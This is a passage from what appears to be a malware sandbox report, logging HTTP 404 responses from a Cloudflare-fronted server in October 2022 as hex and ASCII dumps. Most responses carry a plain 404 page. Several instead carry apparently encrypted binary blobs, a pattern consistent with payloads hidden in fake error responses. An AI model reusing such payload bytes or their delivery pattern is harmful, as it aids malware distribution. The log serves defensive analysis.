48 8a 79 b3 54 Data Ascii: 3830=Zq <`~E&oCW74o8s#u!}1k-AQY^.%k*0.%sJ& ADi~/EOw9j3N F}O?nbZ@"y*&PDhkv)*ss;Ieus60Qnv4a)H4Q'{7@5r~s45T9ZXrJ=Y
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O0GPtpWaEUghJ1RZgPxRZQ%2FbNvsXTqmfccmnAAfZK01bYa7QRlFfHiPsPzV%2B8T2jJ8DeWoywcL6xPCJBdp7L9%2FnTqte%2FpemWOANEEJHqywZ2CzA9%2BaG3w6ui%2Fn2Kk%2Bd3Mg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c49ffd8775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iQopJci%2FORQ7R2gzSi1W37HimXMOqa5r2FwomB83BIDxGz5qQDusFANJR4n92C%2Fm0zzmMJ9%2Fc1Wd4iOzO47rUnhTpPC7ayhqY0VR3OS%2BwcA%2FIiNAYrugixuONmn1fsT7vg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c4ac937775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KflXCBDDGP50V0sC8JW5W1jfd6Byw5tcbluoCjWwjmwE6FZk4KlQ00lV1sByV2VEcvGqIx6dtEPZ18YJFdSQj7V%2FAABMhHRWqOQqb%2Bir1mXW5Un3kwGwbWdWAAVzXUv4%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c4b7a72775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 37 61 32 37 0d 0a 00 00 b4 60 3b d4 0f 1a 40 10 16 30 8f b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 53 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 1d 8f e2 e3 b3 98 30 06 81 8f f1 83 0e 25 a6 79 5e 5c 51 fb 32 35 47 48 3b fe cc bd 6c 62 ad 5d 6f 38 6d 57 12 73 36 18 28 a6 70 a3 d1 43 36 2f a4 14 0f 85 c2 e7 27 c2 25 7b ba 49 79 b9 53 68 47 8f 2a f5 db fa 6a c6 86 04 12 fc 2a 54 e9 30 f6 c7 35 f3 73 07 03 d2 1f f9 d8 fa e0 b3 89 71 cd 37 33 33 d1 68 73 45 7c 1f 57 44 8d e8 be 3c 50 35 51 fe 08 22 b9 7f 18 66 3d 28 2a 87 6a dd d6 be db 43 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 fa cb 1f 9e 1d 09 52 2b e5 8d 83 7b 7e 45 f7 ff 28 c8 55 db 88 0c 15 13 b7 99 a3 b8 24 08 4f c5 03 a1 cb a1 81 7e 50 54 62 b8 1b 0e 7e f1 ac 9a a5 6e d0 a0 c1 b9 dd 7a 91 28 4d 19 e0 3c 95 a9 18 da f6 96 be 25 11 61 9a c4 3e 7c 88 2a c8 48 6f a1 c0 4a 9a 03 fd ec 9a aa 7b ac 87 2f bd 61 0d e0 40 bf 46 30 fd f8 12 6c 33 6c 2b 7c 0b 8d c7 fd e4 0e a4 eb 7e 71 eb 80 e5 1a 68 8b 4a d8 19 ae cc 4f 2b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2e b9 d4 fe cc 23 b2 15 0a 31 79 2a 88 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 11 38 27 a0 54 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 6f c3 cb 29 71 67 a3 1e 1e 54 ab 1e 06 d1 12 ee c3 de 57 a3 4c b3 86 1f d4 58 68 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 86 7d 10 ff 54 f8 8d f1 99 07 99 8a 75 c4 7f 74 79 90 6e 43 cc 9b 8b 8b e1 d0 79 d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 92 ae 46 df 92 f2 f9 7a 8f f6 6b e3 30 dd d9 37 00 70 e0 1c c9 20 f5 52 48 10 39 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 58 58 07 6b ab f6 ae 25 2e 39 86 ce ec 35 98 c7 a7 0d ba ca d4 5f fd 40 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 81 c4 a1 f3 0b 0f Data Ascii: 7a27`;@0,xO}q4 SJ%9Wd8IkDJ8P>0%y^\Q25GH;lb]o8mWs6(pC6/'%{IyShG*j*T05sq733hsE|WD<P5Q"f=(*jC\SMUdT[Up"XJ3Ob>!Z:V?#BSSR+{~E(U$O~PTb~nz(M<%a>|*HoJ{/a
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gVzVkIdvGHsVsbVyl9qAqELjnheZhBTdilA%2FYBYYtREmG4AyMm4OPYAxgHFpqQapv5gTS9596QNG3zC6tPloLNgs8wbYWc4crSz5o%2B4h5M906%2Bs3BtDtaZekkH6EH5fupw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c4fabd6775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jf8tuzyNHiGxIa0zvNaFROwVGFGkC4p2vORRtZV0p2ZOe0B1kIYqrEM0kvT7CeOTEV1qoMR%2BEf0nMkgAuYg24NYAWaYTLi85XF774%2BdgXwTaJ92PdTrQ36d5TElqeKgC2A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c506d58775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 34 64 63 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 f3 dd 04 32 ea 42 12 5b 46 12 e9 97 9a 81 35 54 01 13 96 75 50 bf d8 5d 92 a7 0a d6 30 71 33 94 a3 7c f7 e2 3e 59 57 e3 c6 68 c5 9b 3b 73 51 59 64 64 b8 d8 f9 20 3d 8f 58 93 e0 7a bb f8 db e4 63 48 c7 01 a0 b0 4d f2 16 85 c5 fc 90 13 19 77 bf 6c 13 d9 7b 64 58 ed 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cf 00 40 ab d1 74 d7 07 53 53 fa cb 1f 9e fd 09 50 2a ee 8c 8a 7b 7e c1 f6 ff 78 ff 5e db c4 0d 13 13 3f 68 e1 92 24 18 4f c5 03 01 ca a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 2a f8 96 be 21 51 61 1a 06 32 7c 8a 28 c8 c9 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d 5b 7a e5 0e f4 eb 7e 71 eb b0 fe 1a 20 58 4b d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 27 b9 52 e0 cc 23 82 67 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 43 9d cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d 9f 7e 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 23 e9 de 8e 82 11 e8 e4 1f da a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 f4 94 8c 1f d4 fc 69 91 9c 4b 0f f1 2c d6 af 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 84 7a 8a 8b e1 52 71 d7 9c 4c c2 e0 2b 43 be bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 a2 bc 5b 6f e3 e3 1c 35 02 f5 52 48 c4 37 96 4d ef e7 17 3f 72 e9 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6c 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 Data Ascii: 4dc`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*2B[F5TuP]0q3|>YWh;sQYdd =XzcHMwl{dX3Ob>!ZC:>@tSSP*{~x^?h$Oa~i~]DzN,*!Qa2|(kJk
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kdrk%2BI3TPzzBSGru%2FZEBLzbK6IgPFNf7GuUwJsCxPOzjgxe54ZHXJixzmEotD9trkIwKBrHM02OlQ4YtgVuES87UGuDnAAjYSLb5F282Yh7iSD1e3epB5Pac2behNs%2FXZw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c5b3aa7775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CPdcGF13lhzY81sJOmlQQo9XpKs43HfMQcJl4zhOPMgh1M39btdzSClGR9q35TZZMfB41g32XuN4asjL9EB9HYKs0aXOk9tRL87VTP9fzSINEHLMszfR8NQu0DrSDC09ww%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c5c0c08775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 32 35 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 49 c0 5f 80 07 8a b8 57 f7 67 a4 78 0a 4a 79 f5 7e 01 0d 0a Data Ascii: 25Uys/~(`:I_WgxJy~
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1Uzncdx4UMuhhUiRX5VkaPAAPefJwrVL%2FeEUCMxcP28gJiPeZ2n1M8%2FpL5rgZ46yx%2B47aHj56DDb3aCHXRuSJ3wnzMfkdrtwFzgPn5gieoDAL2le%2Bd49cLsNgwDjAEQrwQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c639b89775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qMvBT1UAbtskSjA7MFZ%2BYE11ESQPWfYbRHugTjF1DQ4quWuCnsXZggfTxhgw7%2FFuC%2BTRhR9asexvZr%2BjbCNLDhMeuEnKYi96u9IXpaAcvYdQjs1XJTje%2F%2FP95UANk09ahw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c65af4d775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oG%2Fvt0bxAC7zNxZx6Tvp2jebR7Lx4OE77NKgStoJpZ5S%2BhUwOQ1tVRHVsh4x7UDYmlcfGs4ZZ7ufMqX%2BbzdmFgQd1ITGUQfhyOSAG798vGKcJQ7hcD1esJYh5ZO%2BobdZQg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c6719c5775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 32 66 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 4c c2 48 9f 00 81 b8 51 f5 7a bf 7b 14 0c 78 f9 68 10 61 9e 4b 26 08 72 9f a8 9c b9 0d 0a Data Ascii: 2fUys/~(`:LHQz{xhaK&r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yksv3kmO87MHRsnm6qb2P%2FM4BWUhSUWtLt9yuq3UkenKr3%2FkCQGyMnUCW6wSU%2F9Exi0OdFydm8XkeuIXNt0CfIv%2FL8Gu8bl%2Fb4W%2FYZbnjOnIqi1aK%2FRy3TtrJg3qmCT9wg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979ca98ae8775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 